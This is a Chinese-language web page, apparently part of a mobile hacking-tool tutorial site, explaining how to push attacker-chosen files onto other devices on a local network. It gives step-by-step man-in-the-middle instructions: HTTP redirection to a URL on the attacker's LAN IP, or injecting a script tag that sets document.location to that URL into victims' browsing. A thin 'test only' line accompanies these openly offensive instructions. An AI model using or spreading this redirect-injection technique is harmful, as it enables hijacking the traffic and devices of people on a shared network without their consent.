<!DOCTYPE html>
<!--[if IE 8 ]><html class="no-js oldie ie8" lang="en"> <![endif]-->
<!--[if IE 9 ]><html class="no-js oldie ie9" lang="en"> <![endif]-->
<!--[if (gte IE 9)|!(IE)]><!--><html class="no-js" lang="en"> <!--<![endif]-->
<head>

<!--- basic page needs
================================================== -->
<meta charset="utf-8">
<title>RS数据后台</title>
<meta name="description" content="">  
<meta name="author" content="">

<!-- mobile specific metas
================================================== -->
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">

<!-- CSS
================================================== -->
<link rel="stylesheet" href="css/base.css">  
<link rel="stylesheet" href="css/main.css">
<link rel="stylesheet" href="css/vendor.css">     

<!-- script
================================================== -->   
<script src="js/modernizr.js"></script>
<script src="js/pace.min.js"></script>

<!-- favicons
================================================== -->
<link rel="icon" type="image/png" href="favicon.png">

</head>

<body id="top">

<!-- header 
================================================== -->
<header>   	
<div class="row">

	<div class="top-bar">
		<a class="menu-toggle" href="#"><span>Menu</span></a>

		<div class="logo">
			 <a href="index.html">KARDS</a>
		  </div>		      

<nav id="main-nav-wrap">
				<ul class="main-navigation">
					<li class="current"><a href="/rs/rs.html">首页</a></li>
					<li><a href="/rs/jc.html">初学教程</a></li>
					<li><a href="/rs/p.html">视频攻击</a></li>
					<li><a href="/rs/i.html">音频攻击</a></li>
					<li><a href="/rs/k.html">文字攻击</a></li>
					<li><a href="/rs/m.html">破碎图片</a></li>					
					<li><a href="/rs/r.html">图标攻击</a></li>	
					<li><a href="/rs/d.html">上传穿透</a></li>	
					<li><a href="/rs/wq.html">关于作者</a></li>	
				</ul>
			</nav>    		
	</div> <!-- /top-bar --> 
	
</div> <!-- /row --> 		
</header> <!-- /header -->

<!-- intro section
================================================== -->


   	

</section> <!-- /intro -->


<!-- about section
================================================== -->
<section id="about">  

<div class="row section-intro">
	<div class="col-twelve">

		<h5>zantirs</h5>
		<h1>上传文件穿透</h1>

		<div class="intro-info">

			<img src="images/ac.jpg" alt="Profile Picture">

				<p class="lead">该功能可通过,被攻击设备中的视频，音频,浏览器软件强行穿透上传文件。</p>
				<h5>该功能仅作为测试功能</h5>
				
			<p class="lead">需要上传的文件必须存放在。/sdcard/anti/www/aaa/dr/目录下，文件类型不限制，
			<h5>文件全称.指你有一个视频文件命为"web"<br>那么，全称就是"web.mp4"</h5>
						<h1>复制以下代码</h1>

			<p class="lead"><br><br>http://?????:8080/aaa/dr/#####<br><br><br>把代码中"?????"的五个问号！替换成你的局域网ip地址！<br><br>把代码中"#####"的五个井号！替换成你需要上传文件的全称</p>
		
		</div>   			

	</div>   		
</div> <!-- /section-intro -->





<section id="portfolio">

	<div class="row section-intro">
	<div class="col-twelve">

		<h5>插入代码攻击</h5>
		<h3>选择你要攻击设备</h3>

		<p class="lead">选择"中间人"再次选择"重新导向http"将代码粘贴上去，必须要把代码中"?????"的五个问号！替换成你的局域网ip地址！<br><br>把代码中"#####"的五个井号！替换成你需要上传文件的全称</p>

	</div>   		
</div> <!-- /section-intro--> 

<div class="row portfolio-content">

	<div class="col-twelve">

		<!-- portfolio-wrapper -->
		
		 <div id="folio-wrapper" class="block-1-2 block-mob-full stack">

			<div class="bgrid folio-item">
			   <div class="item-wrap">
				<img src="images/br.jpg" alt="Liberty">
				                   	           
					 <div class="folio-item-table">
						<div class="folio-item-cell">
								   <h3 class="folio-title">Liberty</h3>	     					    
									 <span class="folio-types">
									  Graphic Design
								   </span>
							   </div>	                      	
					 </div>                    
				  
			   </div>	               
				</div> <!-- /folio-item -->
				

			

		 </div> <!-- /portfolio-wrapper --> 

	</div>  <!-- /twelve -->   

</div> <!-- /portfolio-content --> 
	
</section> <!-- /portfolio --> 


<!-- CTA Section
================================================== -->
<section id="portfolio">

	<div class="row section-intro">
	<div class="col-twelve">
	<h1>攻击方法二<h1>

		<h5>zantirs</h5>
		<h1>插入html</h1>
		<h1><br><br>复制以下代码</1>
		
		<h5>注意不能把"@@@"复制到其中</h5>
		


	</div>   		
</div> <!-- /section-intro--> 
<xmp>@@@<script language='javascript'></xmp><xmp>document.location = </xmp><xmp>'http://?????:8080/aaa/dr/#####'</xmp><xmp></script></xmp>
	<div class="row section-intro">
	<div class="col-twelve">
	 <p class="lead"><br><br><br>把代码中"?????"的五个问号！替换成你的局域网ip地址！</p>
	<p class="lead">选择"中间人"再次选择"插入html"将代码粘贴上去，必须要把代码中"?????"的五个问号！替换成你的局域网ip地址！<br><br>把代码中"#####"的五个井号！替换成你需要上传文件的全称</p>
	</div>
</div>
<div class="row portfolio-content">

	<div class="col-twelve">

		<!-- portfolio-wrapper -->
		
		 <div id="folio-wrapper" class="block-1-2 block-mob-full stack">

			<div class="bgrid folio-item">
			   <div class="item-wrap">
				<img src="images/cr.jpg" alt="Liberty">
				                   	           
					 <div class="folio-item-table">
						<div class="folio-item-cell">
								   <h3 class="folio-title">Liberty</h3>	     					    
									 <span class="folio-types">
									  Graphic Design
								   </span>
							   </div>	                      	
					 </div>                    
				  
			   </div>	               
				</div> <!-- /folio-item -->
				

			

		 </div> <!-- /portfolio-wrapper --> 

	</div>  <!-- /twelve -->   

</div> <!-- /portfolio-content --> 
	
</section> <!-- /portfolio --> 





<footer>
	<div class="row">

		<div class="col-six tab-full pull-right social">

			<ul class="footer-social">        
			  <li><a href="#"><i class="fa fa-facebook"></i></a></li>
			  <li><a href="#"><i class="fa fa-behance"></i></a></li>
			  <li><a href="#"><i class="fa fa-twitter"></i></a></li>
			  <li><a href="#"><i class="fa fa-dribbble"></i></a></li>
			  <li><a href="#"><i class="fa fa-instagram"></i></a></li>
		   </ul> 
			
	  </div>

	<div class="col-six tab-full">
		<div class="copyright">
				<span>两种攻击代码,只能选择其中一个,同时攻击可能会有未知错误<br><br>2018.02.26编辑</span> 
				<h1>RS双羽<br><br>QQ·311****526</h1>
			 </div>		                  
		</div>

		<div id="go-top">
			 <a class="smoothscroll" title="Back to Top" href="#top"><i class="fa fa-long-arrow-up"></i></a>
		  </div>

	</div> <!-- /row -->     	
</footer>  

<div id="preloader"> 
	<div id="loader"></div>
</div> 

<!-- Java Script
================================================== --> 
<script src="js/jquery-2.1.3.min.js"></script>
<script src="js/plugins.js"></script>
<script src="js/main.js"></script>

</body>
</html>